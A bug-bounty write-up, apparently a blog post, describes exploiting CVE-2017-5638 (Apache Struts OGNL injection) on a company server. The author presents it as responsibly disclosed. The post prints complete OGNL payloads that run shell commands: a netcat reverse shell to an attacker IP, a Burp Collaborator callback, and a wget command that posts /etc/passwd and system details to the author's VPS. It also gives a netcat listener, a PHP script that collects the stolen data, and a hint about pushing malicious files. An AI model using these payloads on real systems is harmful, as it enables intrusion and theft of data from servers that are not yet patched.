Taking Entire server control Part 2 of How I Earned $2500 in 5 Minutes | CVE-2017–5638 | OGNL injection | RCE

Hello, Infosec fam! Welcome to Part 2 of our series on Unleashing the Power of Recon: How I Earned $2500 in 5 Minutes | CVE-2017–5638 | OGNL injection | RCE. If you missed the previous write-up, I highly recommend giving it a read before diving into this one. In this write-up, we will explore how I successfully exploited this vulnerability to gain a reverse shell.

After confirming the bug by assessing the response header, I quickly proceeded to set up my machine and configure port forwarding. Port forwarding provides a static address, allowing anyone from remote locations to access my machine. However, I encountered a few challenges while using ngrok and portmapio.

Despite the challenges, I confirmed that the application was vulnerable to remote code execution. To proceed, I decided to purchase a VPS, which came with basic Linux tools and a static IP address. I configured my VPS IP in the payload to establish a reverse connection.

Payload:

"%{(#_=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=’nc -e /bin/sh x.x.x.x 8090’).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

After creating my payload, I initiated the reverse connection using the netcat syntax “nc -lvp 8090”.

Listener :

nc -lvp 8090

However, after sending the payload through the repeater, nothing happened. I tried various possibilities but to no avail. It struck me after many attempts of fail I was taught what if that my payload might be blocked by a firewall. To overcome this, I fired up my Burp Collaborator client.

Burp Collaborator is a powerful tool that provides a network service for detecting invisible vulnerabilities.

So I decided to create a payload with a burp collaborator link

Payload :

“%{(#_=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=’curl -X http://burpcolab.link/’).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

Note: The above image was added to show an example output of a burp collaborator its not an actual payload output

By adding the payload with the Burp Collaborator link, I instantly received HTTP and DNS pingbacks, indicating that the application was indeed vulnerable. However, I was unable to obtain a reverse shell. To proceed, I used the “wget” command to run Linux commands and send the information to my VPS server. I created a simple PHP script to listen to and receive all HTTP packets and store them in a text file.

My initial payload involved reading “/etc/passwd,” followed by executing “whois,” “pwd,” and “ifconfig.” All this information was sent to my VPS server and stored in a text file.

wget payload :

wget%20-O%20-%20 — post-data=”whois=$(whois)&pwd=$(pwd)&ls=$(ls)&ifconfig=$(ifconfig)&passwd=$(cat%20/etc/passwd)”%20https://xxxxxx/exploit.php

Complete payload :

“%{(#_=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=’wget%20-O%20-%20 — post-data=”whois=$(whois)&pwd=$(pwd)&ls=$(ls)&ifconfig=$(ifconfig)&passwd=$(cat%20/etc/passwd)”%20https://xxxxxx/exploit.php’).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

PHP Code :

<?php
// Get the raw HTTP request data
$requestData = file_get_contents(‘php://input’);

// Get the request headers
$headers = getallheaders();

// Get the user agent
$userAgent = $_SERVER[‘HTTP_USER_AGENT’];

// Create a string with the HTTP packet information
$httpPacket = “HTTP Request:\n\n”;
$httpPacket .= “Headers:\n”;
foreach ($headers as $header => $value) {
$httpPacket .= “$header: $value\n”;
}
$httpPacket .= “\n”;
$httpPacket .= “User Agent: $userAgent\n\n”;
$httpPacket .= “Request Data:\n$requestData\n”;

// Append the HTTP packet to the text file
$filename = ‘out.txt’;
file_put_contents($filename, $httpPacket, FILE_APPEND);

echo “HTTP packet appended to $filename\n”;
?>

After successfully recording a proof of concept, I reported the vulnerability to the company. They promptly patched the issue and offered me a bounty as a token of appreciation for my responsible disclosure.

There are additional possibilities with this OGNL payload. For instance, using the same “wget” command, one could download malicious files to the server by hosting malicious scripts on their VPS. However, I have not personally tested this approach, as I was limited to reading files and running OS commands to showcase the vulnerabilities.

Conclusion:

As an ethical hacker, my goal is to expose vulnerabilities and assist companies in strengthening their security measures. Exploiting CVE-2017–5638 through OGNL injection and remote code execution was an enlightening experience. Remember, responsible disclosure is key to fostering a safer digital environment.

Happy hacking, and stay secure!

Another Write-up about 300$ bounty :

https://medium.com/bugbountywriteup/from-payload-to-300-bounty-a-story-of-crlf-injection-and-responsible-disclosure-on-hackerone-eeff74aff422

Connect with me:

Twitter: https://twitter.com/karthithehacker

Instagram: https://www.instagram.com/karthithehacker/

LinkedIn: https://www.linkedin.com/in/karthikeyan--v/

Website: https://www.karthithehacker.com/

Github : https://github.com/karthi-the-hacker/

npmjs: https://www.npmjs.com/~karthithehacker

Youtube: https://www.youtube.com/@karthi_the_hacker

Thank you

Karthikeyan.V